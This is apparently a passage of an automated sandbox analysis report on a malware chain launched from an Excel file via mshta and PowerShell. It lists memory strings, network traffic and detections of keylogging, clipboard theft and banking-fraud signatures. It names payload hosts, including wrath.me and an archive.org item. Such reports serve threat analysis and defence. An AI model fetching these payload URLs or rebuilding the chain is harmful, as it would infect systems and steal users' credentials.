                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452480910.0000000000272000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.593504050.000000001ABBC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488611411.0000000003930000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C38A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 00000018.00000002.483636245.00000000009C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                    Source: RegAsm.exe, 00000018.00000002.483291462.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/GK
                    Source: RegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: RegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://www.msn.com/
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                    Source: RegAsm.exe, 00000015.00000002.485996514.00000000003E3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                    Source: RegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://contextual.media.net/
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                    Source: powershell.exe, 00000007.00000002.458200384.0000000012481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000007.00000002.458200384.0000000012481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000007.00000002.458200384.0000000012481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                    Source: powershell.exe, 0000000E.00000002.473005129.0000000002512000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.517043980.00000000024F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org
                    Source: powershell.exe, 0000000C.00000002.553505468.0000000002854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.598837287.0000000002A21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org/32/it
                    Source: powershell.exe, 0000001D.00000002.517043980.0000000002BDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot
                    Source: powershell.exe, 0000001D.00000002.517043980.00000000024F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg
                    Source: powershell.exe, 0000000E.00000002.473005129.0000000002512000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.517043980.00000000024F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgX
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                    Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: powershell.exe, 00000007.00000002.458200384.0000000012481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C31F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C100000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488297453.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473378608.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488611411.0000000003930000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487926229.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C386000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C38A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.593504050.000000001AB50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.442807206.00000000032C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487881018.0000000003955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488616620.0000000003955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/
                    Source: mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me//
                    Source: mshta.exe, 0000000F.00000002.488297453.000000000026A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.872488880.0000000000851000.00000004.00000020.00020000.00000000.sdmp, QPS-36477.xls, 58430000.0.dr, logs.dat.17.drString found in binary or memory: https://wrath.me/EhYykL
                    Source: mshta.exe, 00000004.00000002.442405393.000000000040A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/EhYykL/
                    Source: mshta.exe, 00000004.00000002.442405393.000000000040A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/EhYykL1(
                    Source: mshta.exe, 0000000F.00000002.488297453.000000000026A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/EhYykLi
                    Source: mshta.exe, 0000000F.00000002.488297453.000000000026A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/EhYykLm
                    Source: mshta.exe, 0000000F.00000003.475534357.00000000039BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.00000000039BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.00000000039BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/EhYykLr.htax
                    Source: mshta.exe, 00000004.00000002.442847727.0000000003328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.0000000003328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/EhYykLr.htay(
                    Source: mshta.exe, 00000004.00000002.442405393.000000000040A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/EhYykLs#
                    Source: mshta.exe, 00000004.00000002.442452182.0000000000480000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440469832.0000000000480000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/_
                    Source: mshta.exe, 0000000F.00000002.488297453.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473378608.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487926229.00000000002A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrath.me/bu
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                    Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: bhv8392.tmp.21.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49161 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49170 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49169 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000030_2_0040A2F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0041183A OpenClipboard,GetLastError,21_2_0041183A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,21_2_0040987A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,21_2_004098E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,23_2_00406DFC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,23_2_00406E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,24_2_004068B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,24_2_004072B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,30_2_004168FC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,30_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,30_2_0040A41B
                    Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.powershell.exe.12a41af0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b940b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4072, type: MEMORYSTR

                    E-Banking Fraud

                    Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.powershell.exe.12a41af0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b940b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000002.873711232.000000000248E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872848173.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872488880.0000000000835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872848173.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001E.00000002.516366128.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872488880.0000000000851000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
